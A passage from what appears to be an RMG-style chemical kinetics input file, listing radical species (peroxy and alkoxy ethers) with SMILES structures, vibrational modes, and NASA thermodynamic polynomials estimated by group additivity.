thermo = NASA(polynomials=[NASAPolynomial(coeffs=[0.121597,0.0842122,-9.25798e-05,5.09531e-08,-1.1085e-11,-5044.15,30.7827], Tmin=(100,'K'), Tmax=(1117.42,'K')), NASAPolynomial(coeffs=[17.1748,0.023167,-1.06337e-05,2.06289e-09,-1.46732e-13,-8855.26,-53.3825], Tmin=(1117.42,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(-43.109,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(311.793,'J/(mol*K)'), comment="""Thermo group additivity estimation: group(O2s-Cs(Cds-Cd)) + group(O2s-OsCs) + group(O2s-CsH) + group(O2s-OsH) + group(Cs-CsOsOsH) + group(Cs-CsOsHH) + group(Cds-CdsOsH) + group(Cds-CdsHH) + radical(CCOJ) + radical(Cs_P)"""),
)
species(
label = '[CH2][C]([O])OO(1352)',
structure = SMILES('[CH2][C]([O])OO'),
E0 = (259.617,'kJ/mol'),
modes = [
HarmonicOscillator(frequencies=([3615,1310,387.5,850,1000,3000,3100,440,815,1455,1000,360,370,350,180],'cm^-1')),
HinderedRotor(inertia=(0.365969,'amu*angstrom^2'), symmetry=1, barrier=(8.41434,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.0124941,'amu*angstrom^2'), symmetry=1, barrier=(36.0133,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.0124334,'amu*angstrom^2'), symmetry=1, barrier=(36.0196,'kJ/mol'), semiclassical=False),
],
spinMultiplicity = 4,
opticalIsomers = 1,
molecularWeight = (75.0434,'amu'),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[2.07061,0.0487342,-8.34891e-05,7.95986e-08,-2.95498e-11,31288.1,22.2062], Tmin=(100,'K'), Tmax=(816.093,'K')), NASAPolynomial(coeffs=[4.97245,0.0220937,-1.16997e-05,2.30933e-09,-1.61703e-13,31227.9,11.3297], Tmin=(816.093,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(259.617,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(170.447,'J/(mol*K)'), comment="""Thermo group additivity estimation: group(O2s-OsCs) + group(O2s-CsH) + group(O2s-OsH) + group(Cs-CsOsOsH) + group(Cs-CsHHH) + radical(Cs_P) + radical(CCOJ) + radical(CJCOOH)"""),
)
species(
label = 'OH(D)(132)',
structure = SMILES('[OH]'),
E0 = (28.3945,'kJ/mol'),
modes = [
HarmonicOscillator(frequencies=([3668.68],'cm^-1')),
],
spinMultiplicity = 2,
opticalIsomers = 1,
molecularWeight = (17.0073,'amu'),
collisionModel = TransportData(shapeIndex=1, epsilon=(665.16,'J/mol'), sigma=(2.75,'angstroms'), dipoleMoment=(0,'C*m'), polarizability=(0,'angstroms^3'), rotrelaxcollnum=0.0, comment="""GRI-Mech"""),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[3.51457,2.92814e-05,-5.32177e-07,1.01951e-09,-3.85951e-13,3414.25,2.10435], Tmin=(100,'K'), Tmax=(1145.75,'K')), NASAPolynomial(coeffs=[3.07194,0.000604011,-1.39759e-08,-2.13452e-11,2.4807e-15,3579.39,4.57799], Tmin=(1145.75,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(28.3945,'kJ/mol'), Cp0=(29.1007,'J/(mol*K)'), CpInf=(37.4151,'J/(mol*K)'), label="""OH(D)""", comment="""Thermo library: primaryThermoLibrary"""),
)
species(
label = 'C[CH]OCC([O])=O(3648)',
structure = SMILES('C[CH]OCC([O])=O'),
E0 = (-199.487,'kJ/mol'),
modes = [
HarmonicOscillator(frequencies=([3025,407.5,1350,352.5,2750,2850,1437.5,1250,1305,750,350,2750,2800,2850,1350,1500,750,1050,1375,1000,200,800,914.286,1028.57,1142.86,1257.14,1371.43,1485.71,1600],'cm^-1')),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
],
spinMultiplicity = 3,
opticalIsomers = 1,
molecularWeight = (102.089,'amu'),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[1.46314,0.0613079,-6.22203e-05,3.87033e-08,-1.06974e-11,-23906.2,23.2433], Tmin=(100,'K'), Tmax=(842.438,'K')), NASAPolynomial(coeffs=[6.72459,0.0363249,-1.77353e-05,3.49857e-09,-2.49761e-13,-24792.6,-1.23782], Tmin=(842.438,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(-199.487,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(291.007,'J/(mol*K)'), comment="""Thermo group additivity estimation: group(O2s-CsCs) + group(O2s-(Cds-O2d)H) + group(Cs-CsOsHH) + group(Cs-(Cds-O2d)OsHH) + group(Cs-CsHHH) + group(Cds-OdCsOs) + radical(CCOJ) + radical(CCsJOCs)"""),
)
species(
label = 'C[CH]O[CH]C([O])OO(3929)',
structure = SMILES('C[CH]O[CH]C([O])OO'),
E0 = (24.6908,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
molecularWeight = (119.096,'amu'),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[-0.583755,0.110366,-0.000178981,1.5404e-07,-5.19416e-11,3125.51,33.8148], Tmin=(100,'K'), Tmax=(830.728,'K')), NASAPolynomial(coeffs=[11.9142,0.0355875,-1.75944e-05,3.36956e-09,-2.31738e-13,1552.81,-21.1307], Tmin=(830.728,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(24.6908,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(332.579,'J/(mol*K)'), comment="""Thermo group additivity estimation: group(O2s-CsCs) + group(O2s-OsCs) + group(O2s-CsH) + group(O2s-OsH) + group(Cs-CsOsOsH) + group(Cs-CsOsHH) + group(Cs-CsOsHH) + group(Cs-CsHHH) + radical(CCOJ) + radical(CCsJOCs) + radical(CCsJOCs)"""),
)
species(
label = '[CH2]COC[C]([O])OO(3930)',
structure = SMILES('[CH2]COC[C]([O])OO'),
E0 = (80.6142,'kJ/mol'),
modes = [
HarmonicOscillator(frequencies=([3615,1310,387.5,850,1000,360,370,350,3000,3100,440,815,1455,1000,2750,2783.33,2816.67,2850,1425,1450,1225,1275,1270,1340,700,800,300,400,200,800,1066.67,1333.33,1600],'cm^-1')),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
],
spinMultiplicity = 4,
opticalIsomers = 1,
molecularWeight = (119.096,'amu'),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[-0.0900314,0.102235,-0.000171121,1.59101e-07,-5.76576e-11,9831.05,34.47], Tmin=(100,'K'), Tmax=(826.847,'K')), NASAPolynomial(coeffs=[6.9374,0.0443169,-2.26546e-05,4.40578e-09,-3.05791e-13,9486.66,6.84779], Tmin=(826.847,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(80.6142,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(332.579,'J/(mol*K)'), comment="""Thermo group additivity estimation: group(O2s-CsCs) + group(O2s-OsCs) + group(O2s-CsH) + group(O2s-OsH) + group(Cs-CsOsOsH) + group(Cs-CsOsHH) + group(Cs-CsOsHH) + group(Cs-CsHHH) + radical(CJCO) + radical(Cs_P) + radical(CCOJ)"""),
)
species(
label = 'CCO[CH][C]([O])OO(3931)',
structure = SMILES('CCO[CH][C]([O])OO'),
E0 = (49.4811,'kJ/mol'),
modes = [
HarmonicOscillator(frequencies=([3025,407.5,1350,352.5,3615,1310,387.5,850,1000,360,370,350,2750,2800,2850,1350,1500,750,1050,1375,1000,2750,2850,1437.5,1250,1305,750,350,200,800,1066.67,1333.33,1600],'cm^-1')),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
],
spinMultiplicity = 4,
opticalIsomers = 1,
molecularWeight = (119.096,'amu'),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[-0.236154,0.104005,-0.000170191,1.52902e-07,-5.38872e-11,6093.29,33.8078], Tmin=(100,'K'), Tmax=(825.151,'K')), NASAPolynomial(coeffs=[8.87185,0.040771,-2.05515e-05,3.97681e-09,-2.75404e-13,5239.83,-4.44613], Tmin=(825.151,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(49.4811,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(332.579,'J/(mol*K)'), comment="""Thermo group additivity estimation: group(O2s-CsCs) + group(O2s-OsCs) + group(O2s-CsH) + group(O2s-OsH) + group(Cs-CsOsOsH) + group(Cs-CsOsHH) + group(Cs-CsOsHH) + group(Cs-CsHHH) + radical(CCOJ) + radical(CCsJOCs) + radical(Cs_P)"""),
)
species(
label = 'C[CH]OCC([O])O[O](3932)',
structure = SMILES('C[CH]OCC([O])O[O]'),
E0 = (-3.76056,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
molecularWeight = (119.096,'amu'),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[-0.0170414,0.099763,-0.000164669,1.5006e-07,-5.31149e-11,-318.631,33.0925], Tmin=(100,'K'), Tmax=(843.19,'K')), NASAPolynomial(coeffs=[7.47209,0.0414355,-2.03468e-05,3.883e-09,-2.66247e-13,-771.083,3.04532], Tmin=(843.19,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(-3.76056,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(336.736,'J/(mol*K)'), comment="""Thermo group additivity estimation: group(O2s-CsCs) + group(O2s-OsCs) + group(O2s-CsH) + group(O2s-OsH) + group(Cs-CsOsOsH) + group(Cs-CsOsHH) + group(Cs-CsOsHH) + group(Cs-CsHHH) + radical(ROOJ) + radical(CCsJOCs) + radical(CCOJ)"""),
)
species(
label = 'C[CH]O[CH][C](O)OO(3933)',
structure = SMILES('C[CH]O[CH][C](O)OO'),
E0 = (4.23197,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
molecularWeight = (119.096,'amu'),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[-0.696058,0.110925,-0.000164595,1.20613e-07,-3.29485e-11,671.088,34.0698], Tmin=(100,'K'), Tmax=(698.899,'K')), NASAPolynomial(coeffs=[16.1831,0.0272815,-1.28912e-05,2.43752e-09,-1.67317e-13,-2004.79,-43.5796], Tmin=(698.899,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(4.23197,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(328.422,'J/(mol*K)'), comment="""Thermo group additivity estimation: group(O2s-CsCs) + group(O2s-OsCs) + group(O2s-CsH) + group(O2s-OsH) + group(Cs-CsOsOsH) + group(Cs-CsOsHH) + group(Cs-CsOsHH) + group(Cs-CsHHH) + radical(CCsJOCs) + radical(Cs_P) + radical(CCsJOCs)"""),
)
species(
label = 'C[CH]OC[C](O)O[O](3934)',
structure = SMILES('C[CH]OC[C](O)O[O]'),
E0 = (-24.2193,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
molecularWeight = (119.096,'amu'),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[-0.322819,0.102988,-0.000161773,1.35562e-07,-4.45665e-11,-2764.82,34.0192], Tmin=(100,'K'), Tmax=(842.134,'K')), NASAPolynomial(coeffs=[11.9671,0.0327075,-1.5384e-05,2.88674e-09,-1.96312e-13,-4412.6,-20.6544], Tmin=(842.134,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(-24.2193,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(332.579,'J/(mol*K)'), comment="""Thermo group additivity estimation: group(O2s-CsCs) + group(O2s-OsCs) + group(O2s-CsH) + group(O2s-OsH) + group(Cs-CsOsOsH) + group(Cs-CsOsHH) + group(Cs-CsOsHH) + group(Cs-CsHHH) + radical(Cs_P) + radical(CCsJOCs) + radical(ROOJ)"""),
)
species(
label = '[CH2][CH]OCC([O])OO(3935)',
structure = SMILES('[CH2][CH]OCC([O])OO'),
E0 = (55.8238,'kJ/mol'),
modes = [
HarmonicOscillator(frequencies=([3025,407.5,1350,352.5,3615,1310,387.5,850,1000,3000,3100,440,815,1455,1000,1380,1390,370,380,2900,435,2750,2850,1437.5,1250,1305,750,350,200,800,1066.67,1333.33,1600],'cm^-1')),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
],
spinMultiplicity = 4,
opticalIsomers = 1,
molecularWeight = (119.096,'amu'),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[-0.436721,0.108584,-0.000179865,1.6017e-07,-5.56784e-11,6863.23,34.4739], Tmin=(100,'K'), Tmax=(831.701,'K')), NASAPolynomial(coeffs=[9.97759,0.0391373,-1.96999e-05,3.7991e-09,-2.62174e-13,5800.49,-9.82462], Tmin=(831.701,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(55.8238,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(332.579,'J/(mol*K)'), comment="""Thermo group additivity estimation: group(O2s-CsCs) + group(O2s-OsCs) + group(O2s-CsH) + group(O2s-OsH) + group(Cs-CsOsOsH) + group(Cs-CsOsHH) + group(Cs-CsOsHH) + group(Cs-CsHHH) + radical(CCOJ) + radical(CJCO) + radical(CCsJOCs)"""),
)
species(
label = '[CH2][CH]OC[C](O)OO(3936)',
structure = SMILES('[CH2][CH]OC[C](O)OO'),
E0 = (35.365,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
molecularWeight = (119.096,'amu'),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[-0.731414,0.111665,-0.0001764,1.44828e-07,-4.67169e-11,4416.57,35.3615], Tmin=(100,'K'), Tmax=(821.04,'K')), NASAPolynomial(coeffs=[14.4469,0.0304556,-1.47648e-05,2.80959e-09,-1.92812e-13,2168.97,-33.3813], Tmin=(821.04,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(35.365,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(328.422,'J/(mol*K)'), comment="""Thermo group additivity estimation: group(O2s-CsCs) + group(O2s-OsCs) + group(O2s-CsH) + group(O2s-OsH) + group(Cs-CsOsOsH) + group(Cs-CsOsHH) + group(Cs-CsOsHH) + group(Cs-CsHHH) + radical(CJCO) + radical(CCsJOCs) + radical(Cs_P)"""),
)
species(
label = 'CCOC[C]([O])O[O](3937)',
structure = SMILES('CCOC[C]([O])O[O]'),
E0 = (21.0298,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
molecularWeight = (119.096,'amu'),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[0.330784,0.0933978,-0.000155853,1.48865e-07,-5.50219e-11,2649.14,33.0848], Tmin=(100,'K'), Tmax=(836.968,'K')), NASAPolynomial(coeffs=[4.43436,0.0466109,-2.32991e-05,4.48911e-09,-3.09816e-13,2914.06,19.7039], Tmin=(836.968,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(21.0298,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(336.736,'J/(mol*K)'), comment="""Thermo group additivity estimation: group(O2s-CsCs) + group(O2s-OsCs) + group(O2s-CsH) + group(O2s-OsH) + group(Cs-CsOsOsH) + group(Cs-CsOsHH) + group(Cs-CsOsHH) + group(Cs-CsHHH) + radical(Cs_P) + radical(ROOJ) + radical(CCOJ)"""),
)
species(
label = 'C[CH][O](605)',
structure = SMILES('C[CH][O]'),
E0 = (149.432,'kJ/mol'),
modes = [
HarmonicOscillator(frequencies=([2750,2800,2850,1350,1500,750,1050,1375,1000,3025,407.5,1350,352.5,2066.51],'cm^-1')),
HinderedRotor(inertia=(0.362113,'amu*angstrom^2'), symmetry=1, barrier=(8.32568,'kJ/mol'), semiclassical=False),
],
spinMultiplicity = 3,
opticalIsomers = 1,
molecularWeight = (44.0526,'amu'),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[3.20363,0.021847,-3.14755e-05,3.43227e-08,-1.42322e-11,17997,11.0861], Tmin=(100,'K'), Tmax=(846.374,'K')), NASAPolynomial(coeffs=[1.2024,0.020386,-9.53523e-06,1.79858e-09,-1.23081e-13,18726.8,22.7175], Tmin=(846.374,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(149.432,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(153.818,'J/(mol*K)'), comment="""Thermo group additivity estimation: group(O2s-CsH) + group(Cs-CsOsHH) + group(Cs-CsHHH) + radical(CCsJOH) + radical(CCOJ)"""),
)
species(
label = 'C[CH]OC[C]([O])[O](3645)',
structure = SMILES('C[CH]OC[C]([O])[O]'),
E0 = (203.681,'kJ/mol'),
modes = [
HarmonicOscillator(frequencies=([3025,407.5,1350,352.5,2750,2850,1437.5,1250,1305,750,350,360,370,350,2750,2800,2850,1350,1500,750,1050,1375,1000,200,800,1000,1200,1400,1600],'cm^-1')),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
],
spinMultiplicity = 5,
opticalIsomers = 1,
molecularWeight = (102.089,'amu'),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[0.783626,0.0845546,-0.000152126,1.50551e-07,-5.63021e-11,24599.7,29.552], Tmin=(100,'K'), Tmax=(849.172,'K')), NASAPolynomial(coeffs=[3.04561,0.0422627,-2.1536e-05,4.15446e-09,-2.8573e-13,25356.2,25.7254], Tmin=(849.172,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(203.681,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(291.007,'J/(mol*K)'), comment="""Thermo group additivity estimation: group(O2s-CsCs) + group(O2s-CsH) + group(O2s-CsH) + group(Cs-CsOsOsH) + group(Cs-CsOsHH) + group(Cs-CsOsHH) + group(Cs-CsHHH) + radical(Cs_P) + radical(CCsJOCs) + radical(CCOJ) + radical(CCOJ)"""),
)
species(
label = 'C[CH]OC[C]([O])O[O](3383)',
structure = SMILES('C[CH]OC[C]([O])O[O]'),
E0 = (201.486,'kJ/mol'),
modes = [
HarmonicOscillator(frequencies=([3025,407.5,1350,352.5,492.5,1135,1000,360,370,350,2750,2800,2850,1350,1500,750,1050,1375,1000,2750,2850,1437.5,1250,1305,750,350,200,800,1066.67,1333.33,1600],'cm^-1')),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
],
spinMultiplicity = 5,
opticalIsomers = 1,
molecularWeight = (118.088,'amu'),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[0.0071793,0.100651,-0.000175647,1.62942e-07,-5.77756e-11,24364.6,33.6933], Tmin=(100,'K'), Tmax=(854.611,'K')), NASAPolynomial(coeffs=[7.33727,0.0390158,-1.95045e-05,3.72262e-09,-2.54145e-13,24109.6,5.31986], Tmin=(854.611,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(201.486,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(311.793,'J/(mol*K)'), comment="""Thermo group additivity estimation: group(O2s-CsCs) + group(O2s-OsCs) + group(O2s-CsH) + group(O2s-OsH) + group(Cs-CsOsOsH) + group(Cs-CsOsHH) + group(Cs-CsOsHH) + group(Cs-CsHHH) + radical(Cs_P) + radical(ROOJ) + radical(CCOJ) + radical(CCsJOCs)"""),
)
species(
label = 'C[CH]O[CH][C]([O])OO(3380)',
structure = SMILES('C[CH]O[CH][C]([O])OO'),
E0 = (229.937,'kJ/mol'),
modes = [
HarmonicOscillator(frequencies=([3000,3050,390,425,1340,1360,335,370,3615,1310,387.5,850,1000,360,370,350,2750,2800,2850,1350,1500,750,1050,1375,1000,200,800,1066.67,1333.33,1600],'cm^-1')),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
],
spinMultiplicity = 5,
opticalIsomers = 1,
molecularWeight = (118.088,'amu'),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[-0.566298,0.111339,-0.000190284,1.67376e-07,-5.68087e-11,27809,34.4395], Tmin=(100,'K'), Tmax=(847.24,'K')), NASAPolynomial(coeffs=[11.8025,0.0331267,-1.67276e-05,3.20325e-09,-2.19136e-13,26424.4,-18.9852], Tmin=(847.24,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(229.937,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(307.635,'J/(mol*K)'), comment="""Thermo group additivity estimation: group(O2s-CsCs) + group(O2s-OsCs) + group(O2s-CsH) + group(O2s-OsH) + group(Cs-CsOsOsH) + group(Cs-CsOsHH) + group(Cs-CsOsHH) + group(Cs-CsHHH) + radical(Cs_P) + radical(CCsJOCs) + radical(CCOJ) + radical(CCsJOCs)"""),
)
species(
label = '[CH2][CH]OC[C]([O])OO(1318)',
structure = SMILES('[CH2][CH]OC[C]([O])OO'),
E0 = (261.07,'kJ/mol'),
modes = [
HarmonicOscillator(frequencies=([3025,407.5,1350,352.5,3615,1310,387.5,850,1000,360,370,350,3000,3100,440,815,1455,1000,2750,2850,1437.5,1250,1305,750,350,200,800,1066.67,1333.33,1600],'cm^-1')),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
],
spinMultiplicity = 5,
opticalIsomers = 1,
molecularWeight = (118.088,'amu'),
collisionModel = TransportData(shapeIndex=2, epsilon=(4363.18,'J/mol'), sigma=(7.26495,'angstroms'), dipoleMoment=(0,'C*m'), polarizability=(0,'angstroms^3'), rotrelaxcollnum=0, comment="""Epsilon & sigma estimated with Tc=681.52 K, Pc=25.82 bar (from Joback method)"""),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[-0.416245,0.109517,-0.000191009,1.73267e-07,-6.04255e-11,31546.6,35.0879], Tmin=(100,'K'), Tmax=(845.45,'K')), NASAPolynomial(coeffs=[9.86044,0.0366864,-1.88389e-05,3.63424e-09,-2.49695e-13,30674.2,-7.64874], Tmin=(845.45,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(261.07,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(307.635,'J/(mol*K)'), comment="""Thermo group additivity estimation: group(O2s-CsCs) + group(O2s-OsCs) + group(O2s-CsH) + group(O2s-OsH) + group(Cs-CsOsOsH) + group(Cs-CsOsHH) + group(Cs-CsOsHH) + group(Cs-CsHHH) + radical(CCsJOCs) + radical(Cs_P) + radical(CCOJ) + radical(CJCO)"""),
)
species(
label = 'CCO[CH]C(=O)OO(3938)',
structure = SMILES('CCO[CH]C(=O)OO'),
